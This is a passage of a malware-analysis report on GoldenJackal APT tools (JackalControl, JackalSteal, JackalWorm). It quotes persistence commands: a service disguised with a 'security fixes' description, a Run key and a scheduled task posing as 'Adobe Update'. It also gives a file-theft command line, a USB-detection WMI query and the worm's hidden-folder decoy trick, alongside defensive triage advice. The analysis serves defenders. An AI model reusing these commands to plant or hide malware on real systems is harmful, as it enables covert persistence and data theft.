The three values are compressed with GZIP, encrypted with DES, and encoded with base64.</p> <p>The resulting payload is concatenated with the BOT_ID using the “|” char, encoded again with base64, after which it gets uploaded to the remote server using the aforementioned POST request format.</p> <h3 id="installer-mode">Installer mode</h3> <p><a name="Installer_mode"></a>Some variants can infect the system, creating a copy of the malware in a specific location and guaranteeing its persistence.</p> <p>The malware location is selected with a specific procedure. It enumerates all subdirectories in CommonApplicationData and randomly selects one to which its copy will be saved. The generated file name will be suffixed with the subdirectory’s names and appended with another static value, Launcher.exe, as outlined below:</p> <div id="crayon-67b40d9467992775197148" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px 
!important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> Selected directory: C:\ProgramData\Windows App Certification Kit Launcher Malware copy: "C:\ProgramData\Windows App Certification Kit Launcher\WindowsAppCertificationKitLauncher.exe"</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467992775197148-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467992775197148-2">2</div><div class="crayon-num" data-line="crayon-67b40d9467992775197148-3">3</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467992775197148-1"><span class="crayon-e">Selected </span><span class="crayon-i">directory</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">C</span><span class="crayon-sy">:</span><span class="crayon-sy">\</span><span class="crayon-i">ProgramData</span><span class="crayon-sy">\</span><span class="crayon-e">Windows </span><span class="crayon-e">App </span><span class="crayon-e">Certification </span><span class="crayon-e">Kit </span><span class="crayon-e">Launcher</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467992775197148-2"><span class="crayon-e">Malware </span><span class="crayon-i">copy</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-s">"C:\ProgramData\Windows App Certification 
Kit</span></div><div class="crayon-line" id="crayon-67b40d9467992775197148-3"><span class="crayon-s">Launcher\WindowsAppCertificationKitLauncher.exe"</span></div></div></td> </tr> </table> </div> </div><p> If the operation succeeds, it also changes the new file timestamp and makes it the same as that of the selected subdirectory.</p> <p>If the operation fails, it randomly selects another directory and tries again to copy the malware.</p> <p>If the operation fails with all subdirectories, it tries to use a list of hard-coded directory names:</p> <ul> <li>Google</li> <li>Viber</li> <li>AdGuard</li> <li>WinZip</li> <li>WinRAR</li> <li>Adobe</li> <li>CyberLink</li> <li>Intel</li> </ul> <p>If all the previous attempts fail, it tries to use the same procedure in the following locations:</p> <ul> <li>ApplicationData</li> <li>LocalApplicationData</li> <li>Temp</li> </ul> <h4 class="" id="persistence">Persistence</h4> <p>The malware’s persistence is usually guaranteed with one of the following mechanisms:</p> <ul> <li>Service installation</li> <li>Creation of a new Windows registry key value</li> <li>Creation of a new scheduled task.</li> </ul> <p>The service is usually installed by the malware with the execution of the Windows sc.exe utility.</p> <div id="crayon-67b40d9467993744126675" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div 
class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> sc create "[MALWARE_NAME_NO_EXT]" binpath= "[MALWARE_FULL_PATH]" /[ARGUMENT]" displayname= "WORKPATH" type= own start= auto sc description "[MALWARE_NAME_NO_EXT]" "This service keeps your installation up to date with the latest enhancements and security fixes." sc start "[MALWARE_NAME_NO_EXT]"</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467993744126675-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467993744126675-2">2</div><div class="crayon-num" data-line="crayon-67b40d9467993744126675-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467993744126675-4">4</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467993744126675-1"><span class="crayon-e">sc </span><span class="crayon-i">create</span><span class="crayon-h"> </span><span class="crayon-s">"[MALWARE_NAME_NO_EXT]"</span><span 
class="crayon-h"> </span><span class="crayon-i">binpath</span>=<span class="crayon-h"> </span><span class="crayon-s">"[MALWARE_FULL_PATH]"</span><span class="crayon-h"> </span>/<span class="crayon-sy">[</span><span class="crayon-i">ARGUMENT</span><span class="crayon-sy">]</span><span class="crayon-s">"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467993744126675-2"><span class="crayon-s">displayname= "</span><span class="crayon-i">WORKPATH</span><span class="crayon-s">" type= own start= auto</span></div><div class="crayon-line" id="crayon-67b40d9467993744126675-3"><span class="crayon-s">sc description "</span><span class="crayon-sy">[</span><span class="crayon-i">MALWARE_NAME_NO_EXT</span><span class="crayon-sy">]</span><span class="crayon-s">" "</span><span class="crayon-r">This</span><span class="crayon-h"> </span><span class="crayon-e">service </span><span class="crayon-e">keeps </span><span class="crayon-e">your </span><span class="crayon-e">installation </span><span class="crayon-e">up </span><span class="crayon-st">to</span><span class="crayon-h"> </span><span class="crayon-e">date </span><span class="crayon-e">with </span><span class="crayon-e">the </span><span class="crayon-e">latest </span><span class="crayon-e">enhancements </span><span class="crayon-st">and</span><span class="crayon-h"> </span><span class="crayon-e">security </span><span class="crayon-i">fixes</span><span class="crayon-sy">.</span><span class="crayon-s">"</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467993744126675-4"><span class="crayon-s">sc start "</span><span class="crayon-sy">[</span><span class="crayon-i">MALWARE_NAME_NO_EXT</span><span class="crayon-sy">]</span>"</div></div></td> </tr> </table> </div> </div><p> The registry value is equal to the copied malware file name, without the extension, and is stored under the following key:</p> <div id="crayon-67b40d9467995879234650" class="crayon-syntax crayon-theme-classic 
crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Value name: "[MALWARE_NAME_NO_EXT]" Value data: "[MALWARE_FULL_PATH] [ARGUMENT]"</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467995879234650-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467995879234650-2">2</div><div class="crayon-num" data-line="crayon-67b40d9467995879234650-3">3</div></div> </td> <td 
class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467995879234650-1"><span class="crayon-i">Key</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-i">HKCU</span><span class="crayon-sy">\</span><span class="crayon-i">Software</span><span class="crayon-sy">\</span><span class="crayon-i">Microsoft</span><span class="crayon-sy">\</span><span class="crayon-i">Windows</span><span class="crayon-sy">\</span><span class="crayon-i">CurrentVersion</span><span class="crayon-sy">\</span><span class="crayon-e">Run</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467995879234650-2"><span class="crayon-e">Value </span><span class="crayon-i">name</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-s">"[MALWARE_NAME_NO_EXT]"</span></div><div class="crayon-line" id="crayon-67b40d9467995879234650-3"><span class="crayon-e">Value </span><span class="crayon-i">data</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-s">"[MALWARE_FULL_PATH] [ARGUMENT]"</span></div></div></td> </tr> </table> </div> </div><p> The scheduled task is created using a hard-coded XML template that is modified at runtime and dropped in the file system using the same malware file path, but with a different extension, .xml instead of .exe.</p> <p>The generated XML file is then used with the Windows schtasks.exe utility to create the task.</p> <p>For example:</p> <div id="crayon-67b40d9467997384882399" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" 
style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> schtasks.exe /create /f /tn "Adobe Update" /xml "C:\ProgramData\Adobe\adobeupd.xml"</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467997384882399-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467997384882399-2">2</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467997384882399-1"><span class="crayon-i">schtasks</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span><span class="crayon-h"> </span>/<span class="crayon-i">create</span><span 
class="crayon-h"> </span>/<span class="crayon-i">f</span><span class="crayon-h"> </span>/<span class="crayon-i">tn</span><span class="crayon-h"> </span><span class="crayon-s">"Adobe Update"</span><span class="crayon-h"> </span>/<span class="crayon-i">xml</span><span class="crayon-h"> </span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467997384882399-2"><span class="crayon-s">"C:\ProgramData\Adobe\adobeupd.xml"</span></div></div></td> </tr> </table> </div> </div><p> The task name and service description change according to the variant, so they should not be relied on as a fixed indicator.</p> <h2 id="jackalsteal">JackalSteal</h2> <p>JackalSteal is another implant, usually deployed on only a few compromised machines, that is used to find files of interest on the target’s system and exfiltrate them to the C2 server.</p> <p>This tool can be used to monitor removable USB drives, remote shares, and all logical drives in the targeted system. The malware can work as a standard process or as a service. It cannot maintain persistence on its own, so it must be installed by another component.</p> <p>JackalSteal starts its execution by parsing the arguments.</p> <table width="100%"> <tbody> <tr> <td style="background-color: #a5a5a5;padding-left: 10px" width="15%"><strong>Option</strong></td> <td style="background-color: #a5a5a5" width="85%"><strong>Description</strong></td> </tr> <tr> <td style="padding-left: 10px"><strong>-n</strong></td> <td>a unique identifier value for the configured profile</td> </tr> <tr> <td style="padding-left: 10px"><strong>-p</strong></td> <td>directory path to inspect; may be given more than once, and the special values <code>all</code> and <code>usb</code> (see below) are also accepted</td> </tr> <tr> <td style="padding-left: 10px"><strong>-s</strong></td> <td>maximum size of requested files</td> </tr> <tr> <td style="padding-left: 10px"><strong>-d</strong></td> <td>number of days since the last write of the requested files</td> </tr> <tr> <td style="padding-left: 10px"><strong>-m</strong></td> <td>a comma-separated list of string masks to look for using a regular expression within the configured directory</td> </tr> 
<tr> <td style="padding-left: 10px"><strong>-w</strong></td> <td>time interval in seconds between consecutive directory scans for the configured profile</td> </tr> <tr> <td style="padding-left: 10px"><strong>-e</strong></td> <td>exclude path from the scanning activities</td> </tr> <tr> <td style="padding-left: 10px"><strong>/0</strong></td> <td>run as standard process</td> </tr> <tr> <td style="padding-left: 10px"><strong>/1</strong></td> <td>run as a service</td> </tr> </tbody> </table> <p>These options allow the attacker to specify the ‘profile’, which defines what files are of interest to the attackers. The profile consists of an ID and a list of patterns. Each pattern contains a list of options with the following properties:</p> <table width="100%"> <tbody> <tr> <td style="background-color: #a5a5a5;padding-left: 10px" width="15%"><strong>Property</strong></td> <td style="background-color: #a5a5a5" width="85%"><strong>Description</strong></td> </tr> <tr> <td style="padding-left: 10px"><strong>Path</strong></td> <td>target paths</td> </tr> <tr> <td style="padding-left: 10px"><strong>credentials</strong></td> <td>user and password used to access a remote share</td> </tr> <tr> <td style="padding-left: 10px"><strong>Masks</strong></td> <td>string with wildcard and mask characters that can be used to match any set of files using a regular expression</td> </tr> <tr> <td style="padding-left: 10px"><strong>MaxSize</strong></td> <td>maximum size of a file</td> </tr> <tr> <td style="padding-left: 10px"><strong>Days</strong></td> <td>the number of days since the file was last written</td> </tr> <tr> <td style="padding-left: 10px"><strong>Interval</strong></td> <td>the time interval between two consecutive path scans</td> </tr> <tr> <td style="padding-left: 10px"><strong>Exclude</strong></td> <td>paths that must be excluded during scanning activities</td> </tr> </tbody> </table> <p>The command used to configure the JackalSteal component is as follows:</p> <div 
id="crayon-67b40d9467998666426436" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-mixed-highlight" title="Contains Mixed Languages"></span><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> %TEMP%\\setup01.exe -p all -p usb -e Windows -e \"Program Files*\" -e ProgramData -e Users\\*\\AppData -e *\\AppData -s 15 -d 30 -w 3600 -m *.doc,*.docx,*.pdf,*.jpg,*.png,*.tif,*.tiff,*.txt,*.ppt,*.pptx,*.xls,*.xlsx -n 48df302a44c392eb</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div 
class="crayon-num" data-line="crayon-67b40d9467998666426436-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467998666426436-2">2</div><div class="crayon-num" data-line="crayon-67b40d9467998666426436-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467998666426436-4">4</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467998666426436-1"><span class="crayon-ta">%</span><span class="crayon-i">TEMP</span><span class="crayon-sy">%</span><span class="crayon-sy">\</span><span class="crayon-sy">\</span><span class="crayon-i">setup01</span><span class="crayon-sy">.</span><span class="crayon-i">exe</span><span class="crayon-h"> </span>-<span class="crayon-i">p</span><span class="crayon-h"> </span><span class="crayon-i">all</span><span class="crayon-h"> </span>-<span class="crayon-i">p</span><span class="crayon-h"> </span><span class="crayon-i">usb</span><span class="crayon-h"> </span>-<span class="crayon-i">e</span><span class="crayon-h"> </span><span class="crayon-i">Windows</span><span class="crayon-h"> </span>-<span class="crayon-i">e</span><span class="crayon-h"> </span><span class="crayon-sy">\</span>"<span class="crayon-i">Program</span><span class="crayon-h"> </span><span class="crayon-i">Files</span>*<span class="crayon-sy">\</span>"<span class="crayon-h"> </span>-<span class="crayon-i">e</span><span class="crayon-h"> </span><span class="crayon-i">ProgramData</span><span class="crayon-h"> </span>-<span class="crayon-i">e</span><span class="crayon-h"> </span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467998666426436-2"> </div><div class="crayon-line" id="crayon-67b40d9467998666426436-3"><span class="crayon-i">Users</span><span class="crayon-sy">\</span><span class="crayon-sy">\</span>*<span 
class="crayon-sy">\</span><span class="crayon-sy">\</span><span class="crayon-i">AppData</span><span class="crayon-h"> </span>-<span class="crayon-e ">e *</span><span class="crayon-sy">\</span><span class="crayon-sy">\</span><span class="crayon-i">AppData</span><span class="crayon-h"> </span>-<span class="crayon-i">s</span><span class="crayon-h"> </span><span class="crayon-cn">15</span><span class="crayon-h"> </span>-<span class="crayon-i">d</span><span class="crayon-h"> </span><span class="crayon-cn">30</span><span class="crayon-h"> </span>-<span class="crayon-i">w</span><span class="crayon-h"> </span><span class="crayon-cn">3600</span><span class="crayon-h"> </span>-<span class="crayon-e ">m </span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467998666426436-4"><span class="crayon-e ">*</span><span class="crayon-sy">.</span><span class="crayon-i">doc</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">docx</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">pdf</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">jpg</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">png</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">tif</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">tiff</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">txt</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">ppt</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">pptx</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">xls</span><span class="crayon-sy">,</span>*<span class="crayon-sy">.</span><span class="crayon-i">xlsx</span><span 
class="crayon-h"> </span>-<span class="crayon-i">n</span><span class="crayon-h"> </span><span class="crayon-cn">48df302a44c392eb</span></div></div></td> </tr> </table> </div> </div><p> The unique identifier passed with “-n” is usually the same BOT_ID generated by the JackalControl Trojan.</p> <p>After argument processing, the malware serializes the profile to XML, encrypts it with DES using a key derived from the ID passed with the “-n” option, and stores the resulting payload in the following location: “%ApplicationData%\SNMP\cache\%Filename%”, where %Filename% is a GUID generated from an MD5 of the unique identifier specified by the attacker. Because the DES key is derived from this ID, an analyst who recovers the “-n” value (for example, from the command line of the service, Run key or scheduled task that launches the implant) can decrypt the cached profile and learn exactly which paths and file types were targeted.</p> <p>The malware is usually executed with the “/0” or “/1” option and the “-n” option, which is used to load the obtained profile ID. When started in this way (rather than with the configuration options above), it loads the profile from the previously mentioned location and starts the ‘Watchers’.</p> <p>A Watcher is an object defined in a class with the same name that runs in a different thread and scans the location according to the specified options. The pattern could represent:</p> <ul> <li>a simple path in the local filesystem;</li> <li>a path on a remote share;</li> <li>constant string all;</li> <li>constant string usb.</li> </ul> <p>When the pattern equals ‘all’, the malware enumerates all logical drives, and for each one it creates a new Watcher object. When the pattern is ‘usb’, it listens for system events corresponding to the action of creating a new removable drive on the system. 
When a new drive is detected, it creates a new Watcher object.</p> <p>Every time a new Watcher is added, the malware records the event in its log and sends the information to the remote C2 using HTTP Post requests.</p> <p>The log is created using the following string as a template:</p> <p><code>Path: {0}{1}\r\nMasks: {2}\r\nExclude: {3}\r\nDays: {4}\r\nMaxSize: {5}\r\nInterval: {6}</code></p> <p>The log is uploaded inside an encrypted payload that contains the following information:</p> <p><code>|<AES_Key,AES_IV><Agent_id\\%yyyyMMddHHmmssfff%.log><Log content>|</code></p> <p>The AES_Key and AES_IV are generated for each request and are encrypted with the RSA algorithm using a key embedded in the code (presumably the public half of an operator-held key pair, in which case uploads captured on the wire cannot be decrypted from the sample alone). The resulting payload is also compressed with the GZIP algorithm.</p> <p>The Agent_id\\Log_path.log and the Log content data are encrypted with the AES algorithm and compressed with GZIP.</p> <p>The Watcher objects are responsible for scanning activities. When a Watcher starts, it enumerates all files in the directory and its subdirectories. The scanner can also resolve the .lnk links. When the scanner detects a file that matches the defined properties (mask, days, max size, not in exclusions), it calculates the file content hash, checks whether that value is already present in a hash table stored in the local cache directory and adds it if not. Only files whose hash was not yet in the table count as new: when a new file is detected, the malware uploads the file and the related filepath inside an encrypted payload using the same logic described above.</p> <p>In this case, the encrypted payload contains the following information:</p> <p><code>|<AES_Key,AES_IV><Agent_id\\Local_file_path><File content>|</code></p> <p>The Agent_id\\Local_file_path and the File content data are encrypted with the AES algorithm and compressed with GZIP.</p> <h2 id="jackalworm">JackalWorm</h2> <p>This worm was developed to spread and infect systems using removable USB drives. 
The program was designed as a flexible tool that can be used to infect systems with any malware.</p> <p>Its behavior changes according to the parent process.</p> <p>When the malware is working on a system that is already infected and the parent process is taskeng.exe or services.exe:</p> <ol> <li>Monitors removable USB drives</li> <li>When a device is attached, hides the last-modified directory and replaces it with a copy of the worm</li> </ol> <p>The code used to monitor removable USB drives is the same one observed in JackalSteal. It creates a ManagementEventWatcher object, which subscribes to WMI event notifications matching a given WQL query and invokes a callback when one arrives. The query below polls every five seconds (the WITHIN 5 clause) for the creation of a Win32_LogicalDisk instance whose DriveType is 2, i.e. a removable disk:</p> <div id="crayon-67b40d9467999532345581" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; 
line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> select * from __InstanceCreationEvent within 5 where TargetInstance ISA 'Win32_LogicalDisk' and TargetInstance.DriveType = 2</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467999532345581-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467999532345581-2">2</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467999532345581-1"><span class="crayon-e ">select *</span><span class="crayon-h"> </span><span class="crayon-e">from </span><span class="crayon-e">__InstanceCreationEvent </span><span class="crayon-i">within</span><span class="crayon-h"> </span><span class="crayon-cn">5</span><span class="crayon-h"> </span><span class="crayon-e">where </span><span class="crayon-e">TargetInstance </span><span class="crayon-i">ISA</span><span class="crayon-h"> </span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d9467999532345581-2"><span class="crayon-s">'Win32_LogicalDisk'</span><span class="crayon-h"> </span><span class="crayon-st">and</span><span class="crayon-h"> </span><span class="crayon-i">TargetInstance</span><span class="crayon-sy">.</span><span class="crayon-i">DriveType</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-cn">2</span></div></div></td> </tr> </table> 
</div> </div><p> When the malware detects a removable USB storage device, it will copy itself onto it. The path it will copy to is determined by listing all directories and selecting the one that was modified last. It will create a copy of itself on the drive root using the same directory name and change the directory’s attribute to “hidden”. This will result in the actual directory being hidden and replaced with a copy of the malware with the directory name. Moreover, JackalWorm uses an icon mimicking a Windows directory, tricking the user into executing the malware when trying to access a directory. A practical triage check on a suspect drive is therefore to look for an executable in the drive root whose base name matches a hidden sibling directory: with hidden items not shown, the listing displays only the decoy.</p> <p>In the following example, the removable drive “E:” was infected by the malware, which copied itself as Folder1.exe and changed the attributes of Folder1 to hide it:</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16221605/GoldenJackal_APT_10.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109717" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16221605/GoldenJackal_APT_10.png" alt="Infected device" width="494" height="280" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16221605/GoldenJackal_APT_10.png 494w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16221605/GoldenJackal_APT_10-300x170.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16221605/GoldenJackal_APT_10-309x175.png 309w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16221605/GoldenJackal_APT_10-370x210.png 370w" sizes="auto, (max-width: 494px) 100vw, 494px" /></a></p> <p style="text-align: center"><strong><em>Infected device</em></strong></p> <p>When the malware starts on a clean system, the parent process is explorer.exe and the file is located on a removable drive, the behavior is as follows:</p> <ol> <li>Opens the 
